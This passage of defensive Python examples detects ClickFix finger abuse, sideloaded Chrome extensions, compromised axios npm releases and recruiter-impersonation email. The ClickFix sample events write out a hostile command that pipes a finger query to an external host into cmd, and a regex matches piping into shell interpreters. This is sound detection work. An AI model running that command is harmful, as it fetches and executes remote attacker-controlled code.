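PIPE_TO_SHELL = re.compile(r"\|\s*(?:cmd|powershell|pwsh|mshta)(?:\.exe)?\b", re.I)

# Constructed allow-list: suffixes where a finger query could be legitimate admin work.
INTERNAL_SUFFIXES = (".corp.example", ".local")


def is_external(host: str) -> bool:
    """True unless the host is loopback, private/link-local, or an allow-listed internal name."""
    host = host.lower().rstrip(".")
    if host == "localhost" or host.endswith(INTERNAL_SUFFIXES):
        return False
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return True  # any other hostname is treated as Internet-facing


def uses_finger(event: dict) -> bool:
    image = ntpath.basename(event.get("Image", "")).lower()
    return image == "finger.exe" or bool(FINGER_TOKEN.search(event.get("CommandLine", "")))


def detect_clickfix_finger(events: list[dict]) -> list[dict]:
    """Return one alert per event that runs finger against an external host."""
    alerts = []
    for ev in events:
        if not uses_finger(ev):
            continue
        cmdline = ev.get("CommandLine", "")
        hosts = [h for h in AT_HOST.findall(cmdline) if is_external(h)]
        if not hosts:
            continue  # finger against an internal box is not this pattern
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        reasons = ["finger query to external host"]
        if PIPE_TO_SHELL.search(cmdline):
            reasons.append("finger output piped into a shell interpreter")
        if parent == "explorer.exe":
            reasons.append("spawned by explorer.exe, consistent with a pasted Run-dialog command")
        alerts.append({"host": hosts[0], "parent": parent, "reasons": reasons, "command": cmdline})
    return alerts


def sample_events() -> list[dict]:
    """Constructed telemetry: the two-event ClickFix chain plus three benign events."""
    return [
        {"Image": r"C:\Windows\System32\cmd.exe",
         "CommandLine": 'cmd.exe /c "finger root@cheeshomireciple.com | cmd"',
         "ParentImage": r"C:\Windows\explorer.exe"},
        {"Image": r"C:\Windows\System32\finger.exe",
         "CommandLine": "finger root@cheeshomireciple.com",
         "ParentImage": r"C:\Windows\System32\cmd.exe"},
        {"Image": r"C:\Windows\System32\finger.exe",
         "CommandLine": "finger jdoe@unixbox.corp.example",
         "ParentImage": r"C:\Windows\System32\cmd.exe"},
        {"Image": r"C:\Windows\System32\finger.exe",
         "CommandLine": "finger @10.0.0.5",
         "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
        {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "powershell.exe -Command Get-Date",
         "ParentImage": r"C:\Windows\explorer.exe"},
    ]


if __name__ == "__main__":
    for alert in detect_clickfix_finger(sample_events()):
        print(alert["host"], "<-", alert["parent"], ";", "; ".join(alert["reasons"]))
```

Run as-is it prints the two events of the chain (the cmd.exe launcher under explorer.exe and the finger.exe child under cmd.exe) and stays quiet on the internal and RFC 1918 queries; in production the event list would come from a SIEM export. The allow-list is the one deliberate blind spot: it keeps an administrator's finger query to a Unix host from alerting, which is about the only legitimate use the binary still has.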
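Worked example for the UNC6692 brief above, covering its recommendation to watch for Chromium extensions that did not come through the Chrome Web Store. This is added here and is not code from the CraftedSignal feed or from the vendor that tracks UNC6692. It reads the extensions.settings dictionary that Chrome keeps in a profile's Preferences or Secure Preferences JSON (which file holds it depends on platform and Chrome version); the extension IDs, names and paths in the sample are constructed, and nothing in it is specific to SNOWBELT, whose loading mechanism the brief does not describe.

```python
"""Flag Chromium extensions that were not installed from the Chrome Web Store.

Added example for the UNC6692 brief; not code from the feed or from the
reporting vendor. Reads Chrome's ``extensions.settings`` dictionary; the
extension IDs, names and paths below are constructed.
"""
import json

WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"

# ManifestLocation values as Chromium records them in extensions.settings.<id>.location
LOCATION_NAMES = {
    1: "internal", 2: "external_pref", 3: "external_registry", 4: "unpacked",
    5: "component", 6: "external_pref_download", 7: "external_policy_download",
    8: "command_line", 9: "external_policy", 10: "external_component",
}
# Browser components and enterprise-policy installs are expected and reviewed elsewhere.
EXPECTED_LOCATIONS = {5, 7, 9, 10}


def classify(ext_id: str, settings: dict):
    """Return a finding dict for an extension that did not come from the Web Store, else None."""
    location = settings.get("location")
    if location in EXPECTED_LOCATIONS:
        return None
    manifest = settings.get("manifest", {})
    update_url = manifest.get("update_url")
    reasons = []
    if not settings.get("from_webstore", False):
        reasons.append("from_webstore is false")
    if update_url != WEBSTORE_UPDATE_URL:
        reasons.append(f"update_url is {update_url!r}, not the Web Store")
    if location in (4, 8):  # "Load unpacked" in developer mode, or --load-extension
        reasons.append(f"loaded {LOCATION_NAMES[location]} from {settings.get('path')!r}")
    if not reasons:
        return None
    return {
        "id": ext_id,
        "name": manifest.get("name", "<unnamed>"),
        "location": LOCATION_NAMES.get(location, str(location)),
        "reasons": reasons,
    }


def find_sideloaded(prefs: dict) -> list[dict]:
    settings = prefs.get("extensions", {}).get("settings", {})
    return [f for f in (classify(i, s) for i, s in settings.items()) if f]


def sample_preferences() -> dict:
    """Constructed excerpt of a Chrome Preferences file with four extensions."""
    return json.loads(r'''{
      "extensions": {"settings": {
        "abcdefghijklmnopabcdefghijklmnop": {"location": 1, "from_webstore": true,
          "manifest": {"name": "Translate Helper", "version": "2.0.13",
                       "update_url": "https://clients2.google.com/service/update2/crx"}},
        "bcdefghijklmnopabcdefghijklmnopa": {"location": 5, "from_webstore": false,
          "manifest": {"name": "Built-in Payments", "version": "1.0.0.6"}},
        "cdefghijklmnopabcdefghijklmnopab": {"location": 4, "from_webstore": false,
          "path": "C:\\Users\\victim\\AppData\\Local\\Temp\\update\\ext",
          "manifest": {"name": "Outlook Sync Helper", "version": "1.0"}},
        "defghijklmnopabcdefghijklmnopabc": {"location": 3, "from_webstore": false,
          "manifest": {"name": "PDF Tools", "version": "3.1",
                       "update_url": "https://updates.vendor-example.net/crx"}}
      }}
    }''')


if __name__ == "__main__":
    for finding in find_sideloaded(sample_preferences()):
        print(finding["id"], finding["name"], finding["location"], "|", "; ".join(finding["reasons"]))
```

Point it at `json.load(open(path))` of a real profile to triage a host. Treat the result as a lead, not a verdict: an attacker with local admin can also deliver an extension through the registry or policy paths this check deliberately skips, so the `location` value alone is never proof of legitimacy.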
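Worked example for the Axios npm brief above: a lockfile scan for the two compromised releases and the injected dependency, which is how its first recommendation is checked in practice. This is added here and is not code from the CraftedSignal feed, from the Axios project or from npm. The version numbers and the dependency name are the ones the brief reports; the lockfile content is constructed. It handles both lockfile layouts, lockfileVersion 1 (nested dependencies) and 2/3 (flat packages keyed by install path), so the same check runs across old and new projects.

```python
"""Scan an npm lockfile for the compromised Axios releases and the injected dependency.

Added example for the Axios brief; not code from the feed, from the Axios
project or from npm. Version numbers and dependency name come from the brief;
the lockfile content below is constructed.
"""
import json
from typing import Iterator

COMPROMISED_AXIOS = {"1.14.1", "0.30.4"}
MALICIOUS_DEP = "plain-crypto-js"

Entry = tuple[str, str, str, dict]  # (install path, name, version, declared deps)


def _iter_v1(deps: dict, prefix: str = "") -> Iterator[Entry]:
    # lockfileVersion 1: a tree; each node may carry its own nested "dependencies"
    for name, info in deps.items():
        path = f"{prefix}node_modules/{name}"
        yield path, name, info.get("version", ""), info.get("requires", {})
        yield from _iter_v1(info.get("dependencies", {}), path + "/")


def _iter_v23(packages: dict) -> Iterator[Entry]:
    # lockfileVersion 2/3: flat map; key "" is the root project, others are install paths
    for path, info in packages.items():
        if not path:
            continue
        name = info.get("name") or path.rsplit("node_modules/", 1)[-1]
        yield path, name, info.get("version", ""), info.get("dependencies", {})


def iter_packages(lock: dict) -> Iterator[Entry]:
    if "packages" in lock:
        yield from _iter_v23(lock["packages"])
    else:
        yield from _iter_v1(lock.get("dependencies", {}))


def scan_lockfile(lock: dict) -> list[tuple[str, str]]:
    """Return (install path, reason) pairs; an empty list means nothing matched."""
    findings = []
    for path, name, version, deps in iter_packages(lock):
        if name == "axios" and version in COMPROMISED_AXIOS:
            findings.append((path, f"compromised axios {version}"))
        if name == MALICIOUS_DEP:
            findings.append((path, f"{MALICIOUS_DEP} {version} present"))
        if MALICIOUS_DEP in deps:
            findings.append((path, f"{name}@{version} declares {MALICIOUS_DEP}"))
    return findings


def sample_lock_v3() -> dict:
    """Constructed lockfileVersion 3 with the compromised axios plus a clean nested copy."""
    return json.loads('''{
      "name": "demo-app", "lockfileVersion": 3, "packages": {
        "": {"name": "demo-app", "dependencies": {"axios": "^1.14.0", "legacy-client": "^2.0.0"}},
        "node_modules/axios": {"version": "1.14.1",
          "dependencies": {"follow-redirects": "^1.15.6", "plain-crypto-js": "^1.0.0"}},
        "node_modules/plain-crypto-js": {"version": "1.0.3"},
        "node_modules/follow-redirects": {"version": "1.15.9"},
        "node_modules/legacy-client": {"version": "2.0.0", "dependencies": {"axios": "^1.7.0"}},
        "node_modules/legacy-client/node_modules/axios": {"version": "1.7.9",
          "dependencies": {"follow-redirects": "^1.15.6"}}
      }}''')


def sample_lock_v1() -> dict:
    """Constructed lockfileVersion 1 carrying the 0.x compromised release."""
    return json.loads('''{
      "name": "demo-legacy", "lockfileVersion": 1, "dependencies": {
        "axios": {"version": "0.30.4", "requires": {"plain-crypto-js": "^1.0.0"},
          "dependencies": {"plain-crypto-js": {"version": "1.0.3"}}},
        "express": {"version": "4.21.2"}
      }}''')


if __name__ == "__main__":
    for sample in (sample_lock_v3(), sample_lock_v1()):
        for path, reason in scan_lockfile(sample):
            print(f"{path}: {reason}")
```

The nested clean axios 1.7.9 in the v3 sample is there on purpose: a project can carry several copies of the same package, and only the one resolved from the registry during the three-hour window matters. Run `scan_lockfile(json.load(open("package-lock.json")))` across repositories and CI caches; a non-empty result means the host that ran `npm install` from that lockfile needs incident handling, not just a version bump.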
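Worked example for the Palo Alto Networks recruiting-impersonation brief above: the mail heuristic its recommendations outline (IOC sender match, free-mail sender that invokes the brand, look-alike domain, and the resume-fee vocabulary) run over constructed messages. This is added here and is not code from the CraftedSignal feed or from Palo Alto Networks. The four sender addresses on the IOC list are the ones the brief publishes; the subjects, bodies and the look-alike domain are constructed, and the brand, free-mail and fee-term lists are assumptions an organisation would tune to its own environment.

```python
"""Score inbound mail for the recruiter-impersonation pattern the brief describes.

Added example; not code from the feed or from Palo Alto Networks. The four IOC
sender addresses are the ones the brief publishes; subjects, bodies and the
look-alike domain are constructed; word lists are tunable assumptions.
"""
import email
import re
from email import policy
from email.utils import parseaddr

BRAND = "palo alto networks"
LEGIT_DOMAINS = {"paloaltonetworks.com"}
FREE_MAIL = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com", "proton.me", "protonmail.com"}
IOC_SENDERS = {
    "paloaltonetworks@gmail.com", "recruiter.paloalnetworks@gmail.com",
    "phillipwalters006@gmail.com", "posunrayi994@gmail.com",
}
# Vocabulary of the manufactured "your CV failed ATS, pay for a rewrite" story.
FEE_TERMS = [r"\bats\b", r"\balignment\b", r"\brewrite\b", r"\bfee\b",
             r"\$\d", r"\bpayment\b", r"\breview panel\b"]


def _searchable_text(msg) -> str:
    """Display name, subject and first text part, lower-cased for matching."""
    body = msg.get_body(preferencelist=("plain", "html"))
    content = body.get_content() if body is not None else ""
    return f"{msg.get('From', '')} {msg.get('Subject', '')} {content}".lower()


def score_message(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    _, addr = parseaddr(str(msg.get("From", "")))
    addr = addr.lower()
    domain = addr.rpartition("@")[2]
    text = _searchable_text(msg)
    claims_brand = BRAND in text
    reasons = []
    if addr in IOC_SENDERS:
        reasons.append("sender address is on the published IOC list")
    if claims_brand and domain in FREE_MAIL:
        reasons.append(f"invokes {BRAND} but is sent from free-mail domain {domain}")
    # Look-alike: brand fragment in a domain that is neither the real one nor a free-mail provider.
    if claims_brand and domain not in LEGIT_DOMAINS | FREE_MAIL and "paloalt" in domain.replace("-", ""):
        reasons.append(f"look-alike sender domain {domain}")
    hits = [t for t in FEE_TERMS if re.search(t, text)]
    if claims_brand and len(hits) >= 2:
        reasons.append(f"recruiting mail that talks money: {len(hits)} fee/ATS terms")
    return {"from": addr, "verdict": "suspicious" if reasons else "clean", "reasons": reasons}


# Constructed messages; only the scam sender address is a real published IOC.
SCAM_MAIL = """\
From: Palo Alto Networks Talent Acquisition <recruiter.paloalnetworks@gmail.com>
To: candidate@example.org
Subject: Your application - resume did not pass our ATS
Content-Type: text/plain; charset="utf-8"

Hello,

Your profile impressed our team, but your resume failed the ATS requirements.
The review panel has already begun. Our partner offers executive ATS alignment
for $600 and can deliver within hours once payment is received.
"""

LEGIT_MAIL = """\
From: Jane Doe <jane.doe@paloaltonetworks.com>
To: candidate@example.org
Subject: Interview schedu­ling - Palo Alto Networks
Content-Type: text/plain; charset="utf-8"

Hello, thanks for applying to Palo Alto Networks. Please pick an interview slot
using the link in your candidate portal.
"""

LOOKALIKE_MAIL = """\
From: Talent Team <hr@paloalto-networks-careers.com>
To: candidate@example.org
Subject: Palo Alto Networks executive search
Content-Type: text/plain; charset="utf-8"

We would like to discuss a senior role with you.
"""

if __name__ == "__main__":
    for label, raw in (("scam", SCAM_MAIL), ("legit", LEGIT_MAIL), ("look-alike", LOOKALIKE_MAIL)):
        result = score_message(raw)
        print(f"{label}: {result['verdict']} {result['reasons']}")
```

The brand gate (`claims_brand`) is what keeps the free-mail and fee checks from firing on ordinary Gmail correspondence: a message only becomes suspicious when it invokes the company and then either comes from a domain the company does not control or steers the conversation toward a paid "ATS" fix. Plug `score_message` into a mail-flow hook or run it over an exported mailbox; the IOC match alone is enough to quarantine, the other reasons are triage signals.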